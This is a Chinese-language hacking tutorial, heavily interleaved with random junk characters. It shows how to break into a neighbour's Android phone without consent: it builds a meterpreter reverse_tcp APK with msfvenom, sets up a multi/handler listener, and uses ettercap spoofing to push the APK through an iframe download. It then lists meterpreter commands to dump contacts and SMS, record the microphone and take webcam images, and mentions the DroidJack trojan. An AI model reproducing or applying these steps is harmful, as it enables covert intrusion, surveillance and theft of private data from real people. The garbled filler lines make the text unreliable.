: l4 ]7 i* ^5 i0 ? 五、msf+ettercap入侵邻居安卓手机
6 @$ [3 J0 O& \# P! e ' {1 B7 _; h& f
. G3 D2 X4 v% k) g' {+ M( N
首先启动msf ' }2 Z, `) n; B8 I* K e8 v2 ^
+ D7 X% |3 {3 G( J% D; k& ?8 w
# _6 d* X$ e5 n 先用kali生成一个安卓木马,如下命令:
- i3 N, i% u) j3 S1 Q
7 [! t4 K, F: B2 B5 C% M; j! q& C( z
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk / s6 ]! w7 s& ?: r* Z$ k
) w: ~( V1 e# U( M/ M2 y
4 r& r: E6 t' E' p, E; p
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ! x* q3 k# s2 W7 e+ |
}( `1 X: P) H+ ? h) D5 N
+ Q4 P6 Q: D5 @3 @0 ] 然后进入msf
2 J9 R4 o# e& e9 S H7 f |
. p/ }& I) u \, w# B
x5 O9 Y: L6 F8 Z! Q3 p, \5 a) Q use exploit/multi/handler % {7 I$ Z! a2 L j& R: C
9 y* R; L6 b4 Z [. V( d
. j* u! r- H7 z" d set payload android/meterpreter/reverse_tcp
6 Q- c. ?1 [* {# m% F. s. `
: k( ~- D0 L, ~$ x- N% Z9 w$ Q9 q* P, A
set LHOST 192.168.0.109 //ip为kaili的ip $ P" ^9 g% g0 [" D% _/ b* w; ~
8 S, R# A$ y$ x% X4 c% x4 R
5 [0 M/ ^ h& f) f+ f; G set LPORT 44444 //端口一定要与前面生成的木马的端口一致
6 {4 Y. V. n! v4 h# N 7 f8 V- m2 e( d5 Z8 Y0 T
( j7 |& A2 D) ?7 ?4 m+ b
Exploit
) p" R ~/ v0 k' h/ p
- }5 a: n& }# r. l1 i, }; |
7 A% S: P: [ a- ?
; i: @$ a! k# Y1 ~; w! ^4 X
W h" p: O, j1 u
, j! M( I" P6 b/ w0 Q+ p: x 下面我们开启ettercap -G _5 Q8 D5 v4 j5 I8 _$ D
4 T( q2 ^. b1 N5 C) c& `* f" M- X1 b4 f
我物理IP为
0 }& b) s1 p) z5 n; u+ o5 U % j0 M0 @& Z, f9 s# u
* J/ ~( ]# V$ U$ s: u% ]$ i- S7 F! v . q0 W- Q* N& _ Y
: X( }5 w2 p7 u" ]0 ~
! O" r/ I# y9 y, { 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
' t' ~% A3 J: R- y5 ~ & a# C& a" |+ S% r' H: e8 E8 ~; g
3 \" J0 {" y2 n' `& V/ B& `! S, p
下面我们来设置一下
t! ~$ H& G0 j, P9 x : u8 |6 c1 o; k4 [+ \
5 L+ e2 R2 S* d9 u J% U8 C
( z2 N" O/ E/ F$ j. {
) C' c$ r4 t; I: Q7 _9 L2 g: x/ @' _& c, ^- E2 v
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ) _, p" K( ^& l% u
0 q6 J |: G% `) _9 Q7 [' s5 b- t/ P" P U
7 c% Q7 Z4 c9 ?0 F8 f3 z
- l" K& E; M! Z* k- m+ C4 Q4 G
2 [* N7 m& [5 a
* x A, P: M# L& n3 g& y% U0 u . k& y4 g6 N/ H) {9 |0 F
; s; z" r# C# Z3 S 7 \! \. l' ?3 j7 F' i
2 i5 g1 A' `5 _6 g8 \9 ?+ Q% V7 K. g" Z
( t5 G- c! p) Z: ^8 o8 `# a
9 l: } d# e2 b' g; r$ S5 R" b8 @5 m) `5 k8 i: H; [4 y
' g. a* n; E& d; N, `
% M; J# J9 O* y1 c/ V1 ]" U" {& e
8 g2 b+ @8 z j3 {$ B0 u + }% ?# T! f* c& [
/ U+ N+ L: B% Z- H2 w
& ^+ X0 T& q4 I& _
- X$ g3 H6 S5 F' a- @- x, `2 ]4 t 1 {* R5 p2 k5 [ R% |, E% K) _
: i( W5 [6 X+ N7 u$ f8 O( `% T
8 U# z1 m6 F/ @4 v
' \( c! Z- j' }# H
2 x0 Y; k' x/ O / q/ |; K- y1 E9 R; D# `6 O
) P+ Y! F$ Y; M$ Z' }4 a/ ?$ {% r% }% Y& ?
) \- f2 o" C& |1 r8 T
; P& ^, B7 M1 c9 ?7 x) p' w
9 ~- _ u# o3 W& M . l5 M% C, X8 ?( o4 i
/ K0 c1 D2 B. r, q9 X
% c2 H0 u% c& h( H/ V: V9 |, S % g6 Z7 v' Q! O/ g0 P
$ u# H+ F" L8 _
9 F w1 n( Z9 Q d" q/ k# `6 ?; t6 B& U4 A, B
1 m7 `- S& R0 ?1 Z9 z# J/ z8 |& e3 m6 k# Z7 F; j
下面我们开始攻击 ' P1 V9 g1 `3 D( u: I9 U
( ]1 k/ M2 _2 n+ H$ j2 d5 Z* h5 `& z+ e' e
/ [+ I8 T* {$ D- v& G, }& P# D4 U
8 X" _5 u, E1 M/ @3 }- l1 b, c+ w3 P. C9 c1 m
# H& M; h/ a4 N: m [
2 ?+ M/ a4 Z; S! b8 T. e
9 w% C& o8 e- Q8 [( @: @: W ) A4 o, \0 s1 ]+ d4 ^
+ }. u. g; R |% O5 J( I9 N
b$ V' a! L& Y3 O
: Z' t( H; K# M& w4 U
# X. B& p, G% y D
: Y$ u0 j4 H) K; e. k k8 M+ w ' \6 c( Q5 A" J5 u8 d. G3 q
7 S4 j& M+ v; ]) E
' Q9 ^1 z0 I% ]( @. ~; b4 I
大概过了5分钟多,发现反弹成功了 ! p [ D) ?( c4 g5 x0 n
( l ^0 }1 `5 B7 ^; _% }
8 O! N7 w0 q6 a# d* [: e% s
$ d- d- S5 q2 g( b- | 4 W2 D- ~& z: \; ~' P) G" E
0 O& |1 r1 n# }: @
) K+ O0 [2 s* W) W. k) S6 T6 r + X; T' f; x' m& ]0 C @
& j3 h# `7 G( i5 U! e0 y " _! J k: p1 L
: o9 B* e0 T. N; v
3 |0 K* E) r8 ?1 a; h n
/ F: |. u4 @7 f5 q
# r% v# Z6 y. \2 b' n$ z1 |" `1 u# S9 S7 n
& |: u' \5 {3 z, o s4 k$ a1 \) s" Y% `7 D: B' g
; C8 w" K1 c4 a2 z* W3 g 6 L: k- K3 {) C0 }8 P' g) B7 r
4 p0 `) E8 |- [4 m5 o7 Q
7 H4 A7 _! o; z4 n
2 z( w" ]1 I/ C6 l) \
- ?, ~6 \6 v9 h2 Q$ B: T$ y" C' Q" Z* [. {
执行命令
; {7 j: j: H. r+ h. G4 d& N6 _1 T! V+ U
$ W# g; k U% o6 n
% V$ G/ w! V, Y( E, k ( g/ C, V. J5 @% B- L1 K$ E
' K$ B5 z0 N# E" p
4 |, o: R! ~7 i* k3 `3 M2 s* A dump_contacts --》这个是导出电话
9 f* J5 Z. V/ K0 S2 u
$ @) I. g0 k9 |. \" j! G) \% |( s: j; n0 W! g3 N3 q' q( g2 t
dump_sms --》这个是导出信息 / ~# f5 L0 ~' _1 G
. P5 E" X, `% P w+ O
3 D7 d% f6 l: N% I record_mic Record audio from the default microphone for X seconds ) S1 w0 E% w. ] A" x6 H$ Z1 U; j
0 r9 s- I% J; ^) q
, W. ~+ b# M/ \' b% G, }
webcam_chat Start a video chat
: w" {7 k3 v0 I/ Z) D1 A " {3 m) {* P* F6 z
% H! H, X8 v& O
webcam_list List webcams 2 X j/ R& S9 I+ p+ H, n) l/ ?
0 ~8 B! O4 [3 r3 L9 \( t" c
1 x1 z; ?2 e0 y" E5 U N3 }
webcam_snap Take a snapshot from the specified webcam
1 y5 X1 E! { v5 ^7 ~ ) @9 `8 J. t/ @" r
# F0 j: @" O# n4 {* R webcam_stream   lay a video stream from the specified webcam , w# l J' o( l; T$ A
. ~9 c$ H3 I0 b- b4 L9 R3 V9 M, E8 E6 a& i) o$ ^5 x
V4 D* M7 o' G6 b$ w ( z$ l% A5 B/ g. G, O; D
1 H3 G! Y* R" z6 r
e; K& \9 C8 r& p8 s8 o
' C' [+ y l- E1 p
2 y/ \2 I1 b- P* Z/ V( g 我们打开看一下电话薄, " d6 y! U4 ?2 z" Z; U2 T% v. Z
0 M; m6 v) r x8 r3 D% B" I9 C- ?: ^4 a1 c
- X9 d! @* a ~* Q; Y
+ Y3 Z# z! g/ W2 v
8 u' q. B; w. r6 x. L6 _ z
) N! x9 C# ?' V7 I/ R1 e" t
! M' j' o4 u: V/ g# n% f2 A
2 Q$ J. w* v8 b* ~5 K0 K* \ 2 k2 `: M+ Y! v2 [: ^ C+ Z( ?
' b/ w* v8 }+ Q9 ^' J# u3 q9 j" Z& V
0 [1 i7 X1 z! T . T/ V! z3 Y7 S" t6 @3 D
% a9 ?4 f# l0 K( t+ L
' D, D% P* s! F ! g% t- O1 G+ r3 U
) L* B9 c& N- t" i
# l: R* x. G3 }7 E* `
/ ]! V9 P, C. V) ?; a% u, { 2 g* N% a2 W3 J( _) j4 D
- L9 g9 x! c& a2 D
我们同时欺骗成DroidJack木马,使用方法如图: 2 m/ \% U) @ R: ~# Y( J
7 h" J3 T" W D- r/ h
. s1 C4 b! v1 c I: g4 i$ j % |5 x8 ]+ f; P6 E
H; A! a& R# P3 N b' E3 w* m" J$ Z, W: C/ x8 p
& @, `8 E8 L) R$ W ; e( r. N1 A- [( ?9 j
2 Y2 Z. o0 u; ^$ b+ l& w) f7 @0 }* s$ D 2 U0 j2 E0 s2 d
+ [" X& {& z# w; P; P: E. U' j9 |4 [1 }" [
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
3 A+ V E1 e- j 0 L" H& s- f4 h- R j# X
& ^- K. ^* |* m3 f8 |
) w0 o. B! G- @% @
& K5 A7 g; v% J( b! F' d! Z9 l
( z" U& w1 }; A% F
1 o( b" R. Q' q: q! f 6 _7 }' G" r* t* J& G' O
: ]1 e' H! M) ^. _2 s) U4 b
$ O/ }: d$ U; [# d; n- T
! I. h; \3 c( S( f
8 D! ~7 f$ [- F6 q5 T! _ ![](https://www.2k8.org/content/uploadfile/201809/22/29b505b3f21449b185bc7b76d957e81b.jpg)
' ^' f: i' t/ s& J. Q' k+ \ : j0 f6 q# ^5 H" ^+ H* t
: E/ y, a0 T8 a5 n ' z0 U7 }0 `) B# x9 i4 `8 B9 R" T. ]
|